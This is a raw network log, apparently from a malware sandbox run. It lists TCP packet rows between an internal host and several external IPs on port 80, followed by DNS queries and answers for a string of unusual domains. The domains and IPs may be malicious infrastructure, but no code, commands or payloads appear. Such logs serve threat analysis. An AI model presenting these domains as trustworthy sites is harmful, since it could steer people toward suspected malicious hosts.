                                                Aug 27, 2024 08:03:53.760426044 CEST804990523.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:54.473866940 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:54.789068937 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:54.789263964 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:54.797867060 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:54.797938108 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:54.797962904 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:55.113465071 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.113523006 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.113560915 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.113825083 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:55.113900900 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.113953114 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.113998890 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:55.114097118 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.114346027 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:55.114515066 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:55.114631891 CEST4990680192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:55.215004921 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.429156065 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.429346085 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.429569006 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.429811954 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.429909945 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.430231094 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.430927992 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:55.430960894 CEST804990623.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:57.317099094 CEST4990780192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:57.621285915 CEST804990723.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:57.621527910 CEST4990780192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:57.626565933 CEST4990780192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:57.930495024 CEST804990723.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:58.031068087 CEST804990723.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:58.031251907 CEST4990780192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:58.031826019 CEST4990780192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:58.335601091 CEST804990723.231.158.3192.168.11.20
                                                Aug 27, 2024 08:04:03.034519911 CEST4990880192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:03.135297060 CEST8049908172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:03.135570049 CEST4990880192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:03.143290997 CEST4990880192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:03.244043112 CEST8049908172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:03.266074896 CEST8049908172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:03.267035007 CEST8049908172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:03.267187119 CEST4990880192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:04.657145023 CEST4990880192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:05.674508095 CEST4990980192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:05.775229931 CEST8049909172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:05.775366068 CEST4990980192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:05.782881975 CEST4990980192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:05.883577108 CEST8049909172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:05.899171114 CEST8049909172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:05.899287939 CEST8049909172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:05.899544954 CEST4990980192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:07.297240019 CEST4990980192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.316378117 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.417213917 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.417397022 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.425949097 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.426000118 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.426045895 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.526738882 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.526751041 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.526772976 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.526782036 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.526906967 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.526913881 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.526918888 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.526966095 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.526995897 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.527012110 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.527184010 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.527185917 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.527245045 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.527254105 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.527352095 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.527439117 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.527632952 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.544146061 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.544998884 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.545123100 CEST4991080192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:08.627629995 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.627741098 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.627856970 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.627985954 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628077030 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628089905 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628185034 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628211975 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628321886 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628334045 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628451109 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628463030 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628473997 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628571033 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.628798008 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:08.645836115 CEST8049910172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:10.954711914 CEST4991180192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:11.055474997 CEST8049911172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:11.055656910 CEST4991180192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:11.060709953 CEST4991180192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:11.161426067 CEST8049911172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:11.175339937 CEST8049911172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:11.175916910 CEST8049911172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:11.176039934 CEST4991180192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:11.177443027 CEST4991180192.168.11.20172.67.191.241
                                                Aug 27, 2024 08:04:11.278031111 CEST8049911172.67.191.241192.168.11.20
                                                Aug 27, 2024 08:04:16.190690994 CEST4991280192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:16.291469097 CEST8049912172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:16.291621923 CEST4991280192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:16.299103022 CEST4991280192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:16.399816036 CEST8049912172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:16.565432072 CEST8049912172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:16.565443993 CEST8049912172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:16.565560102 CEST4991280192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:16.566296101 CEST8049912172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:16.566391945 CEST4991280192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:17.810543060 CEST4991280192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:18.828059912 CEST4991380192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:18.928631067 CEST8049913172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:18.928853035 CEST4991380192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:18.936269045 CEST4991380192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:19.036906004 CEST8049913172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:19.188381910 CEST8049913172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:19.188461065 CEST8049913172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:19.188469887 CEST8049913172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:19.188671112 CEST4991380192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:19.189217091 CEST8049913172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:19.189311981 CEST4991380192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:20.450584888 CEST4991380192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.468240976 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.568836927 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.568958044 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.578556061 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.578605890 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.578659058 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.679105043 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679193974 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679203033 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679269075 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.679318905 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679321051 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.679332972 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679474115 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679538965 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.679582119 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679590940 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679600000 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679708004 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.679729939 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.679878950 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.680047035 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.780204058 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.780273914 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.780286074 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.780345917 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.780395985 CEST4991480192.168.11.20172.67.166.145
                                                Aug 27, 2024 08:04:21.780407906 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:04:21.780417919 CEST8049914172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:05:11.995176077 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:12.002552986 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:12.241764069 CEST8049928185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:12.296715021 CEST8049928185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:12.296803951 CEST8049928185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:12.296958923 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:13.517251015 CEST4992880192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:14.534820080 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:14.774040937 CEST8049929185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:14.774214029 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:14.782661915 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:15.021797895 CEST8049929185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:15.073818922 CEST8049929185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:15.073951960 CEST8049929185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:15.074084044 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:16.297894001 CEST4992980192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.315150023 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.554526091 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.554692984 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.563122034 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.563139915 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.563190937 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.802536011 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802628040 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802639008 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802714109 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802722931 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802731037 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802771091 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802781105 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802840948 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.802959919 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.802968979 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:17.803014040 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.803179026 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:17.803349972 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042181015 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042288065 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042299032 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042315960 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042381048 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042391062 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042512894 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042543888 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042651892 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042675972 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042686939 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042695999 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042704105 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042712927 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042742014 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042751074 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042879105 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042912960 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042969942 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042979002 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.043164968 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.043175936 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.043276072 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.043356895 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.281773090 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.281785011 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.281954050 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282094002 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282104969 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282206059 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282217026 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282325029 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282458067 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282469034 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282478094 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282485962 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.337784052 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.337878942 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.338166952 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:19.078474998 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.096138954 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.335377932 CEST8049931185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:20.335674047 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.341361046 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.580571890 CEST8049931185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:20.632642031 CEST8049931185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:20.632745981 CEST8049931185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:20.632982969 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.634715080 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.873842001 CEST8049931185.230.15.3192.168.11.20
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Aug 27, 2024 07:57:27.044660091 CEST | 192.168.11.20 | 1.1.1.1 | 0xbd5f | Standard query (0) | www.groupriam.com | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:02.104042053 CEST | 192.168.11.20 | 1.1.1.1 | 0x8967 | Standard query (0) | www.foundation-repair.biz | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:22.483973980 CEST | 192.168.11.20 | 1.1.1.1 | 0x8153 | Standard query (0) | www.asa-malukuutara.com | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:23.497296095 CEST | 192.168.11.20 | 9.9.9.9 | 0x8153 | Standard query (0) | www.asa-malukuutara.com | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:38.574615955 CEST | 192.168.11.20 | 9.9.9.9 | 0xfa98 | Standard query (0) | www.sedezne-blazine.shop | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.744371891 CEST | 192.168.11.20 | 9.9.9.9 | 0xa31a | Standard query (0) | www.meetfactory.biz | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:00.178956032 CEST | 192.168.11.20 | 9.9.9.9 | 0xd32a | Standard query (0) | www.518729.xyz | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:14.738310099 CEST | 192.168.11.20 | 9.9.9.9 | 0x418f | Standard query (0) | www.cachsoicautdtc.best | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:28.000693083 CEST | 192.168.11.20 | 9.9.9.9 | 0x7d62 | Standard query (0) | www.itemfilterhub.shop | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:41.419615030 CEST | 192.168.11.20 | 9.9.9.9 | 0xf5ce | Standard query (0) | www.bullbord.top | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:55.213896990 CEST | 192.168.11.20 | 9.9.9.9 | 0xad47 | Standard query (0) | www.cannulafactory.top | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:00:09.492700100 CEST | 192.168.11.20 | 9.9.9.9 | 0x6d96 | Standard query (0) | www.7ddw.top | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:00:23.816513062 CEST | 192.168.11.20 | 9.9.9.9 | 0x2c1 | Standard query (0) | www.home-check.shop | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:00:50.919940948 CEST | 192.168.11.20 | 9.9.9.9 | 0xd5f2 | Standard query (0) | www.emeluzunmoda.online | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:01:05.120215893 CEST | 192.168.11.20 | 9.9.9.9 | 0x5d3f | Standard query (0) | www.ayypromo.shop | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:01:18.851984978 CEST | 192.168.11.20 | 9.9.9.9 | 0xc964 | Standard query (0) | www.magicface.shop | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:01:32.114161968 CEST | 192.168.11.20 | 9.9.9.9 | 0xb82c | Standard query (0) | www.hypepgbet.online | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:03:27.338119984 CEST | 192.168.11.20 | 9.9.9.9 | 0xa674 | Standard query (0) | www.sedezne-blazine.shop | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:05:25.642030954 CEST | 192.168.11.20 | 9.9.9.9 | 0xdf5c | Standard query (0) | www.multfiber.net | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Aug 27, 2024 07:57:27.288184881 CEST | 1.1.1.1 | 192.168.11.20 | 0xbd5f | No error (0) | www.groupriam.com | groupriam.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 27, 2024 07:57:27.288184881 CEST | 1.1.1.1 | 192.168.11.20 | 0xbd5f | No error (0) | groupriam.com | | 199.103.62.205 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:02.215864897 CEST | 1.1.1.1 | 192.168.11.20 | 0x8967 | No error (0) | www.foundation-repair.biz | | 199.59.243.226 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:24.091295004 CEST | 9.9.9.9 | 192.168.11.20 | 0x8153 | No error (0) | www.asa-malukuutara.com | asa-malukuutara.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 27, 2024 07:58:24.091295004 CEST | 9.9.9.9 | 192.168.11.20 | 0x8153 | No error (0) | asa-malukuutara.com | | 103.247.8.53 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:25.834355116 CEST | 1.1.1.1 | 192.168.11.20 | 0x8153 | No error (0) | www.asa-malukuutara.com | asa-malukuutara.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 27, 2024 07:58:25.834355116 CEST | 1.1.1.1 | 192.168.11.20 | 0x8153 | No error (0) | asa-malukuutara.com | | 103.247.8.53 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:38.680150032 CEST | 9.9.9.9 | 192.168.11.20 | 0xfa98 | Name error (3) | www.sedezne-blazine.shop | none | none | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 96.126.123.244 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 198.58.118.167 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 72.14.185.43 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 45.33.2.79 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 45.33.23.183 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 45.33.30.197 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 45.33.20.235 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 45.79.19.196 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 45.56.79.23 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 173.255.194.134 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 72.14.178.174 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:58:46.891068935 CEST | 9.9.9.9 | 192.168.11.20 | 0xa31a | No error (0) | www.meetfactory.biz | | 45.33.18.44 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:00.465051889 CEST | 9.9.9.9 | 192.168.11.20 | 0xd32a | No error (0) | www.518729.xyz | | 23.231.158.3 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:14.857050896 CEST | 9.9.9.9 | 192.168.11.20 | 0x418f | No error (0) | www.cachsoicautdtc.best | | 172.67.191.241 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:14.857050896 CEST | 9.9.9.9 | 192.168.11.20 | 0x418f | No error (0) | www.cachsoicautdtc.best | | 104.21.84.119 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:28.104723930 CEST | 9.9.9.9 | 192.168.11.20 | 0x7d62 | No error (0) | www.itemfilterhub.shop | | 172.67.166.145 | A (IP address) | IN (0x0001) | false |
